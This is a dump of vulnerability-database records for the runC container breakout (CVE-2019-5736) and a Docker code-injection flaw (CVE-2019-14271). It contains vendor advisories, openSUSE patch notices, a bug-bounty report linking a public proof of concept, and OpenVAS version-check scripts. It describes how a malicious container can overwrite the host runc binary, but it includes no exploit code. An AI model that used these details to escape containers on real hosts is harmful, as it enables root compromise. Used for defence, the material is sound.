"cpe:2.3:a:redhat:openshift:3.6:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:-:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:onesphere:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:container_development_kit:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.11:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.05:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.02:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.08:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.4:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2019-12-09T11:26:43", "bulletinFamily": "software", "cvelist": ["CVE-2019-14271"], "description": "### Description\n\nDocker is prone to an arbitrary code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\n\n### Technologies Affected\n\n * Docker Docker 19.03.0 \n * Docker Docker EE 17.06.2-ee-10 \n * Docker Docker EE 17.06.2-ee-11 \n * Docker Docker EE 17.06.2-ee-12 \n * Docker Docker EE 17.06.2-ee-13 \n * Docker Docker EE 17.06.2-ee-15 \n * Docker Docker EE 17.06.2-ee-16 \n * Docker Docker EE 17.06.2-ee-17 \n * Docker Docker EE 17.06.2-ee-18 \n * Docker Docker EE 17.06.2-ee-19 \n * Docker Docker EE 17.06.2-ee-20 \n * Docker Docker EE 17.06.2-ee-21 \n * Docker Docker EE 17.06.2-ee-22 \n * Docker Docker EE 17.06.2-ee-23 \n * Docker Docker EE 17.06.2-ee-3 \n * Docker Docker EE 17.06.2-ee-4 \n * Docker Docker EE 17.06.2-ee-5 \n * Docker Docker EE 17.06.2-ee-6 \n * Docker Docker EE 17.06.2-ee-7 \n * Docker Docker EE 17.06.2-ee-8 \n * Docker Docker EE 17.06.2-ee-9 \n * Docker Docker EE 18.03.1-ee-1 \n * Docker Docker EE 18.03.1-ee-10 \n * Docker Docker EE 18.03.1-ee-3 \n * Docker Docker EE 18.03.1-ee-4 \n * Docker Docker EE 18.03.1-ee-5 \n * Docker Docker EE 18.03.1-ee-6 \n * Docker Docker EE 18.03.1-ee-7 \n * Docker Docker EE 18.03.1-ee-8 \n * Docker Docker EE 18.03.1-ee-9 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic \n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure database servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-09-03T00:00:00", "published": "2019-09-03T00:00:00", "id": "SMNTC-111109", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111109", "type": "symantec", "title": "Docker CVE-2019-14271 Arbitrary Code Execution Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:40:36", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-01T22:35:00", "published": "2019-03-01T22:35:00", "id": "F5:K46421255", "href": "https://support.f5.com/csp/article/K46421255", "title": "Docker privilege elevation vulnerability CVE-2019-5736", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:49", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "# \n\n## Severity\n\nHigh\n\n## Vendor\n\nOpen Container Initiative\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is High unless otherwise noted._\n\n * BPM\n * All prior to v1.0.3\n * Cloud Foundry Container Runtime (CFCR)\n * All versions prior to v0.29.0\n * Docker BOSH Release \n * All versions prior to v34.0.0\n * Garden runC\n * All versions prior to v1.18.2\n\n## Description\n\nThe vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn\u2019t matter if the command is not attacker-controlled) as root within a container in either of these contexts:\n\n* Creating a new container using an attacker-controlled image.\n\n* Attaching (docker exec) into an existing container which the attacker had previous write access to.\n\nThis vulnerability is *not* blocked by the default AppArmor policy, nor by the default SELinux policy on Fedora[++] (because container processes appear to be running as container_runtime_t). However, it *is* blocked through correct use of user namespaces (where the host root is not mapped into the container\u2019s user namespace).\n\nNOTE: The Garden-runC implementation used in Cloud Foundry is not impacted by this vulnerability because it leverages unprivileged containers and user namespaces. Garden has consumed the upstream fix in version v1.18.2 to ensure all redundant security controls remain functional.\n\n## Mitigation\n\nUsers of affected versions should apply the following mitigations or upgrades:\n\n * Releases that have fixed this issue include:\n * BPM: v1.0.3\n * Cloud Foundry Container Runtime (CFCR): v0.29.0\n * Docker BOSH Release: v34.0.0\n * Garden runC: v1.18.2\n\n## References\n\n * * [CVE Announcement](<https://groups.google.com/a/opencontainers.org/forum/#!topic/dev/Tc1ELm-8oDI>)\n * [CVE-2019-5736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5736>)\n\n## History\n\n2019-02-14: Added fixed version for Cloud Foundry Container Runtime (CFCR)\n\n2019-02-13: Initial vulnerability report published\n", "edition": 4, "modified": "2019-02-13T00:00:00", "published": "2019-02-13T00:00:00", "id": "CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC", "href": "https://www.cloudfoundry.org/blog/cve-2019-5736/", "title": "CVE-2019-5736:\u00a0runC container breakout | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-09-26T21:32:55", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2019-5736"], "description": "description here: \nhttps://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html\nPoC: https://github.com/q3k/cve-2019-5736-poc\n\nSome more links:\nhttps://seclists.org/oss-sec/2019/q1/119\nhttps://access.redhat.com/security/cve/cve-2019-5736\n\n## Impact\n\nIt allows to escape from container to root on host when unpatched version of Docker and Kubernetes are used.\nThis affects a pretty big part of internet, since a lot of services are using Docker and Kubernets these days.\nIt has also serious impact on cloud services\nAWS https://aws.amazon.com/security/security-bulletins/AWS-2019-002/ and GCP https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc\nhttps://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/", "modified": "2019-09-26T20:35:06", "published": "2019-02-13T18:50:11", "id": "H1:495495", "href": "https://hackerone.com/reports/495495", "type": "hackerone", "title": "The Internet: CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2019-08-30T02:39:40", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "description": "This update for containerd, docker, docker-runc,\n golang-github-docker-libnetwork fixes the following issues:\n\n Docker:\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch facility\n dynamically loaded a library inside a chroot (bsc#1143409).\n - CVE-2019-13509: Fixed an information leak in the debug log (bsc#1142160).\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413, bsc#1139649).\n\n runc:\n\n - Use %config(noreplace) for /etc/docker/daemon.json (bsc#1138920).\n - Update to runc 425e105d5a03, which is required by Docker (bsc#1139649).\n\n containerd:\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (bsc#1121967).\n - Update to containerd v1.2.6, which is required by docker (bsc#1139649).\n\n golang-github-docker-libnetwork:\n\n - Update to version git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-08-30T00:13:28", "published": "2019-08-30T00:13:28", "id": "OPENSUSE-SU-2019:2021-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html", "title": "Security update for containerd, docker, docker-runc, golang-github-docker-libnetwork (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-03T20:27:36", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762)\n\n", "edition": 1, "modified": "2019-10-03T18:20:43", "published": "2019-10-03T18:20:43", "id": "OPENSUSE-SU-2019:2245-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-07T22:28:25", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762) This\n update was imported from the openSUSE:Leap:15.1:Update update project.\n\n", "edition": 1, "modified": "2019-10-07T21:18:10", "published": "2019-10-07T21:18:10", "id": "OPENSUSE-SU-2019:2286-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-27T15:30:10", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-02-27T12:17:02", "published": "2019-02-27T12:17:02", "id": "OPENSUSE-SU-2019:0252-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00071.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-19T01:01:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2019-02-18T21:26:39", "published": "2019-02-18T21:26:39", "id": "OPENSUSE-SU-2019:0201-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-01-31T16:51:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-08-30T00:00:00", "id": "OPENVAS:1361412562310852679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852679", "type": "openvas", "title": "openSUSE: Security Advisory for containerd, docker, docker-runc, go, go1.11, go1.12, golang-github-docker-libnetwork (openSUSE-SU-2019:2021-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852679\");\n script_version(\"2020-01-31T08:13:19+0000\");\n script_cve_id(\"CVE-2018-10892\", \"CVE-2019-13509\", \"CVE-2019-14271\", \"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:13:19 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-30 02:00:50 +0000 (Fri, 30 Aug 2019)\");\n script_name(\"openSUSE: Security Advisory for containerd, docker, docker-runc, go, go1.11, go1.12, golang-github-docker-libnetwork (openSUSE-SU-2019:2021-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2021-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'containerd, docker, docker-runc,\n go, go1.11, go1.12, golang-github-docker-libnetwork' package(s) announced via the openSUSE-SU-2019:2021-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for containerd, docker, docker-runc,\n golang-github-docker-libnetwork fixes the following issues:\n\n Docker:\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch facility\n dynamically loaded a library inside a chroot (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413, bsc#1139649).\n\n runc:\n\n - Use %config(noreplace) for /etc/docker/daemon.json (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker (bsc#1139649).\n\n containerd:\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker (bsc#1139649).\n\n golang-github-docker-libnetwork:\n\n - Update to version git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2021=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2021=1\");\n\n script_tag(name:\"affected\", value:\"'containerd, ' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"containerd\", rpm:\"containerd~1.2.6~lp150.4.17.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"containerd-ctr\", rpm:\"containerd-ctr~1.2.6~lp150.4.17.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker\", rpm:\"docker~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-debuginfo\", rpm:\"docker-debuginfo~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-libnetwork\", rpm:\"docker-libnetwork~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-libnetwork-debuginfo\", rpm:\"docker-libnetwork-debuginfo~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc\", rpm:\"docker-runc~1.0.0rc8+gitr3826_425e105d5a03~lp150.5.25.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debuginfo\", rpm:\"docker-runc-debuginfo~1.0.0rc8+gitr3826_425e105d5a03~lp150.5.25.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-test\", rpm:\"docker-test~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-test-debuginfo\", rpm:\"docker-test-debuginfo~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-github-docker-libnetwork\", rpm:\"golang-github-docker-libnetwork~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-bash-completion\", rpm:\"docker-bash-completion~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-zsh-completion\", rpm:\"docker-zsh-completion~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-09T12:31:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-14271"], "description": "In Docker linked against the GNU C Library (aka glibc), code injection can\n occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the\n container.", "modified": "2019-08-09T00:00:00", "published": "2019-07-31T00:00:00", "id": "OPENVAS:1361412562310142683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142683", "type": "openvas", "title": "Docker 19.03.0 Code Injection Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:docker:docker';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142683\");\n script_version(\"2019-08-09T06:43:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-08-09 06:43:03 +0000 (Fri, 09 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-31 06:14:45 +0000 (Wed, 31 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-14271\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Docker 19.03.0 Code Injection Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_docker_remote_detect.nasl\", \"gb_docker_service_detection_lsc.nasl\");\n script_mandatory_keys(\"docker/version\");\n\n script_tag(name:\"summary\", value:\"In Docker linked against the GNU C Library (aka glibc), code injection can\n occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the\n container.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Docker version 19.03.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 19.03.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://docs.docker.com/engine/release-notes/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"19.03.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"19.03.1\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875688", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-3f19f13ecd", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875688\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:16:13 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-3f19f13ecd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f19f13ecd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UBRCQV7DJSPM4I25KSQILXWKNX37F5I\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-3f19f13ecd advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which are packaged\nin accordance with the Open Container Initiative', s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:46:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876767", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 